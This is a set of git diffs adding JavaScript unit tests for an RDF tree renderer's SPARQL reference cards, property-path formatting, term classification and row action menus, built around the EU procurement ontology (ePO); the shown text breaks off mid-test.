+    const rows = rowsOf(card(input));
+    const prefixes = valuesFor(rows, 'Prefix').join('\n');
+    const patterns = [
+      ...valuesFor(rows, 'Path'),
+      ...valuesFor(rows, 'Name').map(n => `?typed a ${n} .`),
+      ...valuesFor(rows, 'IRI').map(i => `${i} ?p ?o .`),
+    ];
+    if (!patterns.length) continue;
+
+    const query = `${prefixes}\nSELECT * WHERE {\n  ${patterns.join('\n  ')}\n}`;
+    assert.equal(parses(query), null, `${name} — whole card does not parse:\n${query}`);
+  }
+});
+
+test('no card declares a prefix none of its rows use', () => {
+  // Redundant declarations are valid SPARQL but they are noise, and they hide
+  // whether the derivation is actually tracking what gets emitted.
+  for (const { name, input } of CASES) {
+    const rows = rowsOf(card(input));
+    const used = [...valuesFor(rows, 'Name'), ...valuesFor(rows, 'Path')].join('\n');
+    for (const decl of valuesFor(rows, 'Prefix')) {
+      const prefix = decl.slice('PREFIX '.length, decl.indexOf(':'));
+      assert.ok(used.includes(`${prefix}:`), `${name} — declares ${prefix}: but never uses it`);
+    }
+  }
+});

--- a/test/referenceCardSparql.test.js
+++ b/test/referenceCardSparql.test.js
@@ -302,8 +302,11 @@ const CASES = [
     // the long one's use, and the query would then fail on the real prefix.
     // The anchor deliberately avoids epo:, so the only thing that could put
     // "epo" on the card is loose matching against epo_shape:.
+    // The type is deliberately in no known namespace: it must not put a
+    // prefix on the card itself, and it must not be one of the types that
+    // would make this subject a vocabulary term rather than a resource.
     input: {
-      subject: REVIEWER, types: ['http://www.w3.org/2000/01/rdf-schema#Class'],
+      subject: REVIEWER, types: ['http://example.org/Thing'],
       anchor: '?class a rdfs:Class',
       chain: ['http://www.w3.org/2000/01/rdf-schema#label', 'http://data.europa.eu/a4g/data-shape#note'],
     },
@@ -389,4 +392,380 @@ test('no card declares a prefix none of its rows use', () => {
       assert.ok(used.includes(`${prefix}:`), `${name} — declares ${prefix}: but never uses it`);
     }
   }
+});
+
+// ── the card on a row ───────────────────────────────────────────────
+//
+// A row states one triple, and its card answers for that statement: which
+// property makes it, and how to reach the value from the notice. The same two
+// promises apply — what it offers must parse, and its declarations must cover
+// its rows.
+
+const LITERAL = { termType: 'Literal', value: 'ANAC', datatype: namedNode(`${EPO}x`) };
+
+// Render the card for one row, in the state a given navigation would leave
+// the renderer in. `chain` is the whole walk from the tree root to the value,
+// its last element being the row's own predicate.
+function rowCard({ predicate, chain, anchor = NOTICE_ANCHOR, objectTypes = null, object = LITERAL }) {
+  const r = new TreeRenderer({ innerHTML: '', appendChild() {} });
+  r._navigatedSubject = NOTICE;
+  r._pathFromRoot = [];
+  r._rootPattern = anchor;
+
+  const objectPredicates = objectTypes
+    ? new Map([[RDF_TYPE, objectTypes.map(namedNode)]])
+    : null;
+
+  return r._buildRowInfoRows(predicate, objectPredicates, { root: NOTICE, anchor, chain }, object);
+}
+
+test('a row one step from the notice', () => {
+  const rows = assertCardIsUsable(
+    rowCard({ predicate: `${EPO}hasPublicationDate`, chain: [`${EPO}hasPublicationDate`] }),
+    'row one step down',
+  );
+
+  assert.deepEqual(valuesFor(rows, 'Name'), ['epo:hasPublicationDate']);
+  assert.deepEqual(valuesFor(rows, 'Path'),
+    ['?notice a epo:Notice ; epo:hasPublicationDate ?hasPublicationDate .']);
+});
+
+test('a row three steps down keeps the whole walk in one property path', () => {
+  const rows = assertCardIsUsable(
+    rowCard({
+      predicate: `${EPO}hasLegalName`,
+      chain: [`${EPO}announcesRole`, `${EPO}playedBy`, `${EPO}hasLegalName`],
+    }),
+    'row three steps down',
+  );
+
+  assert.deepEqual(valuesFor(rows, 'Path'), [
+    '?notice a epo:Notice ; epo:announcesRole / epo:playedBy / epo:hasLegalName ?hasLegalName .',
+  ]);
+});
+
+test('a literal is named after the property, having no type of its own', () => {
+  const rows = rowsOf(rowCard({ predicate: `${EPO}hasLegalName`, chain: [`${EPO}hasLegalName`] }));
+  assert.ok(valuesFor(rows, 'Path')[0].endsWith('?hasLegalName .'));
+});
+
+test('a resource is named after what it is', () => {
+  // The row's card and the card you reach by clicking through it should agree
+  // on what the thing is called.
+  const rows = rowsOf(rowCard({
+    predicate: `${EPO}playedBy`,
+    chain: [`${EPO}announcesRole`, `${EPO}playedBy`],
+    objectTypes: [`${EPO}Organization`],
+    object: namedNode(REVIEWER),
+  }));
+
+  assert.ok(valuesFor(rows, 'Path')[0].endsWith('?organization .'), valuesFor(rows, 'Path')[0]);
+});
+
+test('a row pointing at a resource offers its IRI, a row pointing at a literal does not', () => {
+  const resourceRow = rowsOf(rowCard({
+    predicate: `${EPO}playedBy`,
+    chain: [`${EPO}playedBy`],
+    objectTypes: [`${EPO}Organization`],
+    object: namedNode(REVIEWER),
+  }));
+  const literalRow = rowsOf(rowCard({ predicate: `${EPO}hasLegalName`, chain: [`${EPO}hasLegalName`] }));
+
+  assert.deepEqual(valuesFor(resourceRow, 'IRI'), [`<${REVIEWER}>`]);
+  assert.deepEqual(valuesFor(literalRow, 'IRI'), []);
+});
+
+test('a row whose walk crosses vocabularies declares every prefix it uses', () => {
+  // The failure string comparison misses: a path of epo: predicates ending in
+  // an m8g: one, with only epo: declared, does not parse when pasted.
+  const rows = assertCardIsUsable(
+    rowCard({
+      predicate: `${M8G}email`,
+      chain: [`${EPO}announcesRole`, `${EPO}playedBy`, `${M8G}email`],
+    }),
+    'row crossing vocabularies',
+  );
+
+  assert.deepEqual(valuesFor(rows, 'Prefix').sort(), [
+    `PREFIX epo: <${EPO}>`,
+    `PREFIX m8g: <${M8G}>`,
+  ].sort());
+});
+
+test('a predicate in no known namespace is bracketed, not left bare', () => {
+  const rows = assertCardIsUsable(
+    rowCard({ predicate: 'http://example.org/odd', chain: ['http://example.org/odd'] }),
+    'row with an unknown namespace',
+  );
+
+  assert.deepEqual(valuesFor(rows, 'Name'), ['<http://example.org/odd>']);
+});
+
+test('a predicate URI carrying a space is percent-encoded', () => {
+  // Not legal in an IRI to begin with, so the data is already malformed — but
+  // an unescaped space inside <> is a parse error, and the card promises to
+  // parse.
+  assertCardIsUsable(
+    rowCard({ predicate: 'http://example.org/a b', chain: ['http://example.org/a b'] }),
+    'row with a space in the predicate',
+  );
+});
+
+test('a row under a root nobody navigated to still binds by that root', () => {
+  // Nothing was walked to reach this tree, so the row's path starts from the
+  // root card's own type binding rather than from a breadcrumb.
+  const r = new TreeRenderer({ innerHTML: '', appendChild() {} });
+  r._navigatedSubject = null;
+  r._pathFromRoot = [];
+  r._rootPattern = null;
+
+  const html = r._buildRowInfoRows(
+    `${EPO}hasLegalName`,
+    null,
+    { root: NOTICE, anchor: NOTICE_ANCHOR, chain: [`${EPO}hasLegalName`] },
+    LITERAL,
+  );
+
+  assert.deepEqual(valuesFor(assertCardIsUsable(html, 'row under an un-navigated root'), 'Path'),
+    ['?notice a epo:Notice ; epo:hasLegalName ?hasLegalName .']);
+});
+
+test('a row under an unbindable root offers no path at all', () => {
+  // An untyped blank node cannot be named in a query, so nothing below it can
+  // be reached from one either. An unusable pattern would be worse than none.
+  const rows = rowsOf(rowCard({
+    predicate: `${EPO}hasLegalName`,
+    chain: [`${EPO}hasLegalName`],
+    anchor: null,
+  }));
+
+  assert.deepEqual(valuesFor(rows, 'Path'), []);
+  assert.deepEqual(valuesFor(rows, 'Name'), ['epo:hasLegalName'], 'the property is still nameable');
+});
+
+// ── the card on an ontology term ────────────────────────────────────
+//
+// A term's page is not a place in anyone's data. There is no route to it, so
+// no Path; what can be said is the shape of the statement the property makes,
+// which the ontology states as its domain and range.
+
+const RDFS = 'http://www.w3.org/2000/01/rdf-schema#';
+const OWL  = 'http://www.w3.org/2002/07/owl#';
+const XSD  = 'http://www.w3.org/2001/XMLSchema#';
+
+function termCard(termUri, statements) {
+  const r = new TreeRenderer({ innerHTML: '', appendChild() {} });
+  const quads = Object.entries(statements)
+    .flatMap(([p, objects]) => [].concat(objects).map(o => quad(namedNode(termUri), p, namedNode(o))));
+  r.subjectIndex = r._buildIndex(quads);
+  r._navigatedSubject = termUri;
+  r._pathFromRoot = [];
+  r._rootPattern = null;
+  return r._buildInfoRows(termUri, r.subjectIndex.get(termUri));
+}
+
+test('a property is shown by how it is used', () => {
+  const rows = assertCardIsUsable(termCard(`${EPO}hasPublicationDate`, {
+    [RDF_TYPE]: `${OWL}DatatypeProperty`,
+    [`${RDFS}domain`]: `${EPO}Document`,
+    [`${RDFS}range`]: `${XSD}date`,
+  }), 'a datatype property');
+
+  assert.deepEqual(valuesFor(rows, 'Usage'),
+    ['?document epo:hasPublicationDate ?date .']);
+  assert.deepEqual(valuesFor(rows, 'Path'), [], 'a term has no route to it');
+});
+
+test('an object property names both ends after the classes it connects', () => {
+  const rows = assertCardIsUsable(termCard(`${EPO}announcesRole`, {
+    [RDF_TYPE]: `${OWL}ObjectProperty`,
+    [`${RDFS}domain`]: `${EPO}Notice`,
+    [`${RDFS}range`]: `${EPO}AgentInRole`,
+  }), 'an object property');
+
+  assert.deepEqual(valuesFor(rows, 'Usage'), ['?notice epo:announcesRole ?agentInRole .']);
+});
+
+test('a property stating no domain or range still offers a usable pattern', () => {
+  const rows = assertCardIsUsable(termCard(`${EPO}someProperty`, {
+    [RDF_TYPE]: `${OWL}ObjectProperty`,
+  }), 'a property with neither');
+
+  assert.deepEqual(valuesFor(rows, 'Usage'), ['?subject epo:someProperty ?value .']);
+});
+
+test('a property from one class to itself binds two variables, not one', () => {
+  // Otherwise the pattern matches only the resources that point at themselves.
+  const rows = assertCardIsUsable(termCard(`${EPO}modifies`, {
+    [RDF_TYPE]: `${OWL}ObjectProperty`,
+    [`${RDFS}domain`]: `${EPO}Contract`,
+    [`${RDFS}range`]: `${EPO}Contract`,
+  }), 'a self-referential property');
+
+  assert.deepEqual(valuesFor(rows, 'Usage'), ['?contract epo:modifies ?contract2 .']);
+});
+
+test('a class is named, not used — it makes no statement of its own', () => {
+  const rows = termCard(`${EPO}Notice`, { [RDF_TYPE]: `${OWL}Class` });
+
+  assert.deepEqual(valuesFor(rowsOf(rows), 'Usage'), []);
+  assert.deepEqual(valuesFor(rowsOf(rows), 'Name'), ['epo:Notice']);
+});
+
+test('domain and range appear as variable names, never as terms', () => {
+  // Which is why a usage pattern needs no prefix beyond the property's own.
+  const rows = assertCardIsUsable(termCard('http://data.europa.eu/m8g/email', {
+    [RDF_TYPE]: `${OWL}DatatypeProperty`,
+    [`${RDFS}domain`]: `${EPO}ContactPoint`,
+    [`${RDFS}range`]: `${XSD}string`,
+  }), 'a property from another vocabulary');
+
+  assert.deepEqual(valuesFor(rows, 'Usage'), ['?contactPoint m8g:email ?string .']);
+  assert.deepEqual(valuesFor(rows, 'Prefix'), ['PREFIX m8g: <http://data.europa.eu/m8g/>'],
+    'epo: is not declared: no epo: term appears on the card');
+});
+
+// ── what makes something a term ─────────────────────────────────────
+//
+// A vocabulary this application has never heard of is still a vocabulary.
+// What a subject declares itself to be is the reliable signal; the namespace
+// table only answers when the data states nothing.
+
+function cardFor(subject, quads) {
+  const r = new TreeRenderer({ innerHTML: '', appendChild() {} });
+  r.subjectIndex = r._buildIndex(quads);
+  r._navigatedSubject = subject;
+  r._pathFromRoot = [];
+  r._rootPattern = null;
+  return r._buildInfoRows(subject, r.subjectIndex.get(subject));
+}
+
+test('a property in an unknown namespace is a term, not a resource', () => {
+  // Without this it took the resource branch and offered
+  // "?objectProperty a owl:ObjectProperty ." — every object property there is.
+  const CUSTOM = 'http://example.org/customProperty';
+  const rows = assertCardIsUsable(cardFor(CUSTOM, [
+    quad(namedNode(CUSTOM), RDF_TYPE, namedNode(`${OWL}ObjectProperty`)),
+  ]), 'a custom property');
+
+  assert.deepEqual(valuesFor(rows, 'Path'), []);
+  assert.deepEqual(valuesFor(rows, 'Usage'), ['?subject <http://example.org/customProperty> ?value .']);
+});
+
+test('a class in an unknown namespace is a term too', () => {
+  const CUSTOM = 'http://example.org/CustomClass';
+  const rows = rowsOf(cardFor(CUSTOM, [
+    quad(namedNode(CUSTOM), RDF_TYPE, namedNode(`${OWL}Class`)),
+  ]));
+
+  assert.deepEqual(valuesFor(rows, 'Path'), [], 'a class is not somewhere data leads');
+  assert.deepEqual(valuesFor(rows, 'Usage'), [], 'nor does it make a statement of its own');
+});
+
+test('a resource typed with an ordinary class keeps its path', () => {
+  // The reverse mistake: treating everything typed as a term would leave
+  // every resource in a notice without one.
+  const rows = assertCardIsUsable(cardFor(REVIEWER, [
+    quad(namedNode(REVIEWER), RDF_TYPE, namedNode(`${EPO}Reviewer`)),
+  ]), 'an ordinary resource');
+
+  assert.deepEqual(valuesFor(rows, 'Path'), ['?reviewer a epo:Reviewer .']);
+  assert.deepEqual(valuesFor(rows, 'Usage'), []);
+});
+
+test('an untyped subject falls back to the namespace it lives in', () => {
+  // Nothing was loaded about it, so the only signal left is where it lives.
+  const rows = rowsOf(cardFor(`${EPO}somethingUnloaded`, [
+    quad(namedNode(`${EPO}somethingUnloaded`), `${SKOS}note`, { termType: 'Literal', value: 'x' }),
+  ]));
+
+  assert.deepEqual(valuesFor(rows, 'Path'), [], 'an ePO-namespace subject is a term');
+  assert.deepEqual(valuesFor(rows, 'Name'), ['epo:somethingUnloaded']);
+});
+
+const XSD_NS = 'http://www.w3.org/2001/XMLSchema#';
+const RDFS_NS = 'http://www.w3.org/2000/01/rdf-schema#';
+
+test('a term whose declared type this code does not list is still a term', () => {
+  // The list of term types cannot be complete — OWL and RDFS keep company
+  // with metatypes nobody thinks of. Where the term lives answers when what
+  // it declares does not.
+  const rows = rowsOf(cardFor(`${XSD_NS}date`, [
+    quad(namedNode(`${XSD_NS}date`), RDF_TYPE, namedNode(`${RDFS_NS}Datatype`)),
+  ]));
+
+  assert.deepEqual(valuesFor(rows, 'Path'), [], 'not "?datatype a rdfs:Datatype ."');
+  assert.deepEqual(valuesFor(rows, 'Name'), ['xsd:date']);
+});
+
+test('a property carrying both a kind and a characteristic keeps its usage', () => {
+  const rows = assertCardIsUsable(cardFor(`${EPO}hasFixedValue`, [
+    quad(namedNode(`${EPO}hasFixedValue`), RDF_TYPE, namedNode(`${OWL}FunctionalProperty`)),
+    quad(namedNode(`${EPO}hasFixedValue`), RDF_TYPE, namedNode(`${OWL}DatatypeProperty`)),
+    quad(namedNode(`${EPO}hasFixedValue`), `${RDFS_NS}domain`, namedNode(`${EPO}AwardCriterion`)),
+    quad(namedNode(`${EPO}hasFixedValue`), `${RDFS_NS}range`, namedNode(`${XSD_NS}decimal`)),
+  ]), 'a functional property');
+
+  assert.deepEqual(valuesFor(rows, 'Path'), []);
+  assert.deepEqual(valuesFor(rows, 'Usage'), ['?awardCriterion epo:hasFixedValue ?decimal .']);
+});
+
+test('an annotation property makes a statement like any other', () => {
+  // Classified as a term, so it has no Path. Without being counted as a
+  // property it had no Usage either, and the card said nothing at all.
+  const rows = assertCardIsUsable(cardFor(`${OWL}versionInfo`, [
+    quad(namedNode(`${OWL}versionInfo`), RDF_TYPE, namedNode(`${OWL}AnnotationProperty`)),
+  ]), 'an annotation property');
+
+  assert.deepEqual(valuesFor(rows, 'Usage'), ['?subject owl:versionInfo ?value .']);
+});
+
+test('a term declaring only a type this code does not list', () => {
+  // A SHACL shape is vocabulary, not data, and sh:NodeShape is neither class
+  // nor property. Nothing in the declared types identifies it, so only the
+  // namespace it lives in can — which is why that check is not skipped
+  // whenever some type happens to be present.
+  const SHAPE = 'http://data.europa.eu/a4g/data-shape#NoticeShape';
+  const rows = rowsOf(cardFor(SHAPE, [
+    quad(namedNode(SHAPE), RDF_TYPE, namedNode('http://www.w3.org/ns/shacl#NodeShape')),
+  ]));
+
+  assert.deepEqual(valuesFor(rows, 'Path'), [],
+    'not "?nodeShape a sh:NodeShape ." — every shape there is');
+  assert.deepEqual(valuesFor(rows, 'Usage'), [], 'a shape states nothing of its own');
+});
+
+test('a property declaring only an OWL characteristic is a property', () => {
+  // owl:FunctionalProperty is a property class, so it identifies its subject
+  // even in a namespace this application has never seen — where there is no
+  // fallback to rescue it.
+  const CUSTOM = 'http://example.org/customFunctional';
+  const rows = assertCardIsUsable(cardFor(CUSTOM, [
+    quad(namedNode(CUSTOM), RDF_TYPE, namedNode(`${OWL}FunctionalProperty`)),
+  ]), 'a functional property of an unknown vocabulary');
+
+  assert.deepEqual(valuesFor(rows, 'Path'), [],
+    'not "?functionalProperty a owl:FunctionalProperty ."');
+  assert.deepEqual(valuesFor(rows, 'Usage'),
+    ['?subject <http://example.org/customFunctional> ?value .']);
+});
+
+test('a transitive property is recognised the same way', () => {
+  const CUSTOM = 'http://example.org/partOf';
+  const rows = rowsOf(cardFor(CUSTOM, [
+    quad(namedNode(CUSTOM), RDF_TYPE, namedNode(`${OWL}TransitiveProperty`)),
+  ]));
+
+  assert.deepEqual(valuesFor(rows, 'Usage'), ['?subject <http://example.org/partOf> ?value .']);
+});
+
+test('a datatype of some other vocabulary is a term on its own say-so', () => {
+  // Neither in a namespace this application knows nor a class or property:
+  // rdfs:Datatype is the only thing marking it as vocabulary rather than data.
+  const CUSTOM = 'http://example.org/myDatatype';
+  const rows = rowsOf(cardFor(CUSTOM, [
+    quad(namedNode(CUSTOM), RDF_TYPE, namedNode(`${RDFS_NS}Datatype`)),
+  ]));
+
+  assert.deepEqual(valuesFor(rows, 'Path'), []);
 });

--- a/test/termRenderer.test.js
+++ b/test/termRenderer.test.js
@@ -16,7 +16,8 @@
 
 import { test } from 'node:test';
 import assert from 'node:assert/strict';
-import { isNavigableHref } from '../src/js/TermRenderer.js';
+import './_helpers.js'; // document shim — the badge/term renderers build elements
+import { isNavigableHref, renderSubjectBadge, renderTerm, setController } from '../src/js/TermRenderer.js';
 
 test('isNavigableHref accepts http:// URI', () => {
   assert.equal(isNavigableHref('http://data.europa.eu/a4g/ontology#Notice'), true);
@@ -50,4 +51,58 @@ test('isNavigableHref rejects non-string input', () => {
   assert.equal(isNavigableHref(null), false);
   assert.equal(isNavigableHref(undefined), false);
   assert.equal(isNavigableHref(42), false);
+});
+
+// ── viaPath: recording *how* a resource was reached ─────────────────
+//
+// Clicking a resource in the tree navigates to it. The predicate chain
+// walked to get there rides along on the facet, which is what lets the
+// breadcrumb reconstruct the whole route later (issue #73). Without it the
+// breadcrumb knows which resources were visited but not how, and the SPARQL
+// reference card can only fall back to a bare type binding.
+
+const RES = 'http://data.europa.eu/a4g/resource/id_6497924e-6920-4348-8ecb-71530f802aef_Reviewer_3qDoBaQsAXVe5Ci2dDBD6C';
+const EPO_ANNOUNCES_ROLE = 'http://data.europa.eu/a4g/ontology#announcesRole';
+const EPO_PLAYED_BY      = 'http://data.europa.eu/a4g/ontology#playedBy';
+
+// The click handler is only wired when a controller is registered, so the
+// controller has to be installed before the element is built. Returns a sink
+// that records the facet the controller was handed.
+function installController() {
+  const seen = {};
+  setController({ navigateTo(facet) { seen.facet = facet; } });
+  return seen;
+}
+
+function click(el) {
+  const handlers = el._listeners.get('click') || [];
+  assert.equal(handlers.length, 1, 'element should have exactly one click handler');
+  handlers[0]({ preventDefault() {} });
+}
+
+test('clicking a subject badge reports the predicate chain walked to reach it', () => {
+  const seen = installController();
+  click(renderSubjectBadge(RES, { viaPath: [EPO_ANNOUNCES_ROLE, EPO_PLAYED_BY] }));
+
+  assert.equal(seen.facet.type, 'named-node');
+  assert.equal(seen.facet.term.value, RES);
+  assert.deepEqual(seen.facet.viaPath, [EPO_ANNOUNCES_ROLE, EPO_PLAYED_BY]);
+});
+
+test('clicking a leaf term reports its predicate chain too', () => {
+  // Leaf values are navigable as well — the CPV code in issue #73's example
+  // is reached this way, not through a nested card.
+  const seen = installController();
+  click(renderTerm({ termType: 'NamedNode', value: RES }, { viaPath: [EPO_ANNOUNCES_ROLE] }));
+
+  assert.deepEqual(seen.facet.viaPath, [EPO_ANNOUNCES_ROLE]);
+});
+
+test('a badge rendered without a chain reports an empty one, never undefined', () => {
+  // Root cards have nothing above them. DataView flat-maps viaPath across the
+  // breadcrumb, so an undefined here would break the whole reconstruction.
+  const seen = installController();
+  click(renderSubjectBadge(RES));
+
+  assert.deepEqual(seen.facet.viaPath, []);
 });

--- a/test/treeRenderer.test.js
+++ b/test/treeRenderer.test.js
@@ -254,3 +254,43 @@ test('_partitionObjects preserves per-object order within each bucket', () => {
   assert.deepEqual(nestable.map(o => o.value), [LOT, PROCEDURE]);
   assert.deepEqual(nonNestable.map(o => o.value), ['a', 'b']);
 });
+
+// ── _formatPropertyPath ─────────────────────────────────────────────
+
+const EPO = 'http://data.europa.eu/a4g/ontology#';
+
+test('_formatPropertyPath shrinks ePO predicates to prefixed form', () => {
+  const r = makeRenderer();
+  const path = r._formatPropertyPath([
+    EPO + 'refersToLot',
+    EPO + 'hasPurpose',
+    EPO + 'hasMainClassification',
+  ]);
+  assert.equal(path, 'epo:refersToLot / epo:hasPurpose / epo:hasMainClassification');
+});
+
+test('_formatPropertyPath handles a single-predicate path', () => {
+  const r = makeRenderer();
+  const path = r._formatPropertyPath([EPO + 'hasPublicationDate']);
+  assert.equal(path, 'epo:hasPublicationDate');
+});
+
+test('_formatPropertyPath wraps unknown-namespace URIs in angle brackets', () => {
+  const r = makeRenderer();
+  const path = r._formatPropertyPath(['http://example.org/custom#someProperty']);
+  assert.equal(path, '<http://example.org/custom#someProperty>');
+});
+
+test('_formatPropertyPath mixes prefixed and full URIs in one path', () => {
+  const r = makeRenderer();
+  const path = r._formatPropertyPath([
+    EPO + 'refersToLot',
+    'http://example.org/custom#link',
+  ]);
+  assert.equal(path, 'epo:refersToLot / <http://example.org/custom#link>');
+});
+
+test('_formatPropertyPath returns empty string for an empty path', () => {
+  const r = makeRenderer();
+  assert.equal(r._formatPropertyPath([]), '');
+});

--- a/test/treeRenderer.test.js
+++ b/test/treeRenderer.test.js
@@ -891,6 +891,9 @@ test('every link in a rendered tree either carries its route or is a predicate',
   const walk = (el) => {
     for (const child of el._children || []) {
       if (child.nodeType !== 1) continue;
+      // The actions menu is not a link into the graph — its items open a card
+      // and copy to the clipboard. This is about what navigates.
+      if (String(child.className).includes('tree-actions')) continue;
       const handlers = child._listeners?.get('click') || [];
       const navigates = handlers.length && !String(child.className).includes('tree-toggle');
       if (navigates) {
@@ -916,4 +919,370 @@ test('every link in a rendered tree either carries its route or is a predicate',
     assert.ok(facet.viaRoot, 'and the subject that route starts from');
     assert.ok(facet.viaRootPattern, 'and the pattern binding that subject');
   }
+});
+
+// ── the reference card is reachable from every row ──────────────────
+//
+// Anoop's review of #110: a path was only available on a card you had
+// navigated to, so collecting several meant walking the tree once per value,
+// and a literal — never a card — had none at all.
+
+const EPO_HAS_LEGAL_NAME = 'http://data.europa.eu/a4g/ontology#hasLegalName';
+
+function renderedNotice() {
+  const r = makeRenderer();
+  const container = { innerHTML: '', _children: [], appendChild(c) { this._children.push(c); } };
+  r.container = container;
+  r.render([
+    quad(NOTICE, RDF_TYPE, namedNode(EPO_NOTICE_CLASS)),
+    quad(NOTICE, EPO_ANNOUNCES_ROLE, namedNode(REVIEWER)),
+    quad(REVIEWER, RDF_TYPE, namedNode(EPO_REVIEWER_CLASS)),
+    quad(REVIEWER, EPO_HAS_LEGAL_NAME, literal('ANAC')),
+  ], { subjectUri: NOTICE, rootPattern: '?notice a epo:Notice' });
+  return { r, container };
+}
+
+// Everything under an element, in document order, the shim having no
+// querySelectorAll that takes a class.
+function descendants(el, found = []) {
+  for (const child of el?._children || []) {
+    found.push(child);
+    descendants(child, found);
+  }
+  return found;
+}
+
+function actionMenus(el, found = []) {
+  if (String(el.className || '').includes('tree-actions ')) found.push(el);
+  (el._children || []).forEach(c => actionMenus(c, found));
+  return found;
+}
+
+// The kebab and the items behind it.
+const kebabOf = (menu) => menu._children.find(c => c.className === 'tree-actions-btn');
+const itemsOf = (menu) => menu._children
+  .find(c => String(c.className).includes('dropdown-menu'))
+  ._children.map(li => li._children[0])
+  .filter(el => String(el.className).includes('dropdown-item'));
+const labelsOf = (menu) => itemsOf(menu).map(b => b.innerHTML.replace(/<[^>]*>/g, '').trim());
+const itemNamed = (menu, label) => itemsOf(menu)[labelsOf(menu).indexOf(label)];
+const cardItemOf = (menu) => itemNamed(menu, 'SPARQL reference card');
+
+test('every row carries a menu, alongside the one on the card', () => {
+  const { container } = renderedNotice();
+
+  // The root card's own menu, and one on each of its two rows — `type →
+  // epo:Notice` and the nested Reviewer's header. The Reviewer's body is
+  // lazy, so its own rows are not built yet.
+  assert.equal(actionMenus(container).length, 3);
+});
+
+test('the type row is a row like any other', () => {
+  // No exception carved out for it: it states a triple, so it answers for one.
+  const r = makeRenderer();
+  const path = r._buildRowPathPattern(RDF_TYPE, null, {
+    root: NOTICE,
+    anchor: '?notice a epo:Notice',
+    chain: [RDF_TYPE],
+  });
+
+  assert.equal(path, '?notice a epo:Notice ; rdf:type ?type .');
+});
+
+test('the menu holds the reference card behind one item', () => {
+  // A menu rather than a bare button, because a row is where further actions
+  // on a single statement will go.
+  const { container } = renderedNotice();
+  const menu = actionMenus(container)[0];
+
+  assert.equal(kebabOf(menu).getAttribute('data-bs-toggle'), 'dropdown');
+  assert.match(cardItemOf(menu).innerHTML, /SPARQL reference card/);
+});
+
+test('no popover is built until the reference card is asked for', () => {
+  // A notice puts hundreds of these on screen and almost none is opened, so
+  // constructing them at render would be paid for every time and used rarely.
+  const Real = bootstrap.Popover;
+  let built = 0;
+  bootstrap.Popover = class extends Real { constructor(...args) { super(...args); built++; } };
+  try {
+    const { container } = renderedNotice();
+    assert.equal(built, 0, 'nothing constructed at render');
+
+    const item = cardItemOf(actionMenus(container)[1]);
+    item._listeners.get('click')[0]({ stopPropagation() {} });
+    assert.equal(built, 1, 'constructed when the item is chosen');
+
+    item._listeners.get('click')[0]({ stopPropagation() {} });
+    assert.equal(built, 1, 'and only once');
+  } finally {
+    bootstrap.Popover = Real;
+  }
+});
+
+test('opening the menu on a card header does not expand the card', () => {
+  // The menu sits inside the header, and clicking the header toggles the
+  // card. Without an exception, reaching for the menu expands what is under it.
+  const { container } = renderedNotice();
+  const nestedCard = descendants(container)
+    .filter(el => String(el.className) === 'tree-card')
+    .at(-1);
+  const header = descendants(nestedCard)
+    .find(el => String(el.className).includes('tree-card-header'));
+  const kebab = kebabOf(actionMenus(header)[0]);
+  const bodies = () => descendants(nestedCard)
+    .filter(el => String(el.className) === 'tree-card-body').length;
+
+  // A nested card builds its body only when expanded, so expansion shows up
+  // as the body coming into existence.
+  assert.equal(bodies(), 0, 'collapsed to begin with');
+  header._listeners.get('click').forEach(fn => fn({ target: kebab }));
+  assert.equal(bodies(), 0, 'and still collapsed after reaching for the menu');
+
+  // The same click anywhere else on the header does expand it, so the test
+  // above is about the exception and not about clicks being inert.
+  header._listeners.get('click').forEach(fn => fn({ target: header }));
+  assert.equal(bodies(), 1, 'a click on the header itself still expands');
+});
+
+test('the card hangs off what it describes, not off the kebab', () => {
+  // Anchored on the property that names the statement, so the card appears
+  // beside the row it answers for rather than at the right edge.
+  const Real = bootstrap.Popover;
+  const anchors = [];
+  bootstrap.Popover = class extends Real {
+    constructor(el, opts) { super(el, opts); anchors.push(el); }
+  };
+  try {
+    const { container } = renderedNotice();
+    const menu = actionMenus(container)[1];
+    cardItemOf(menu)._listeners.get('click')[0]({ stopPropagation() {} });
+
+    assert.equal(anchors.length, 1);
+    assert.ok(anchors[0].classList.contains('predicate'),
+      `expected the predicate, got ${anchors[0].className}`);
+  } finally {
+    bootstrap.Popover = Real;
+  }
+});
+
+test('a root card hangs off its badge', () => {
+  const Real = bootstrap.Popover;
+  const anchors = [];
+  bootstrap.Popover = class extends Real {
+    constructor(el, opts) { super(el, opts); anchors.push(el); }
+  };
+  try {
+    const { container } = renderedNotice();
+    cardItemOf(actionMenus(container)[0])._listeners.get('click')[0]({ stopPropagation() {} });
+
+    // Identity, not class names: a subject badge renders as a split pill or a
+    // solid one depending on the URI, and either is the badge.
+    const header = descendants(container)
+      .find(el => String(el.className).includes('tree-card-header'));
+    const badge = header._children.find(c => c === anchors[0]);
+    assert.ok(badge, `expected the header's badge, got ${anchors[0].className}`);
+  } finally {
+    bootstrap.Popover = Real;
+  }
+});
+
+// ── copying from the menu ───────────────────────────────────────────
+
+test('a row offers the path first, then the value, then the card', () => {
+  // People reading a notice this closely are mostly learning SPARQL and ePO.
+  const { container } = renderedNotice();
+
+  assert.deepEqual(labelsOf(actionMenus(container)[1]),
+    ['Copy path', 'Copy value', 'SPARQL reference card']);
+});
+
+test('what is copied is the value itself, not the short form on screen', () => {
+  // The screen shows "epo:Notice"; a query, a spreadsheet or a colleague's
+  // message needs the URI.
+  const r = makeRenderer();
+  const container = { innerHTML: '', _children: [], appendChild(c) { this._children.push(c); } };
+  r.container = container;
+  r.render([quad(NOTICE, RDF_TYPE, namedNode(EPO_NOTICE_CLASS))], { subjectUri: NOTICE });
+
+  assert.equal(itemNamed(actionMenus(container)[1], 'Copy value').getAttribute('data-copy'),
+    EPO_NOTICE_CLASS);
+});
+
+test('a resource row copies its IRI, a literal row its text', () => {
+  const r = makeRenderer();
+  const container = { innerHTML: '', _children: [], appendChild(c) { this._children.push(c); } };
+  r.container = container;
+  r.render([
+    quad(NOTICE, RDF_TYPE, namedNode(EPO_NOTICE_CLASS)),
+    quad(NOTICE, 'http://example.org/label', literal('ANAC AUTORITA')),
+  ], { subjectUri: NOTICE });
+
+  const copied = actionMenus(container).slice(1)
+    .map(m => itemNamed(m, 'Copy value').getAttribute('data-copy'));
+
+  assert.deepEqual(copied, [EPO_NOTICE_CLASS, 'ANAC AUTORITA']);
+});
+
+test('a root card copies its IRI, having no single value of its own', () => {
+  // Its menu answers for the resource as a whole rather than for one
+  // statement, so there is an identifier to copy but no "value".
+  const { container } = renderedNotice();
+
+  assert.deepEqual(labelsOf(actionMenus(container)[0]),
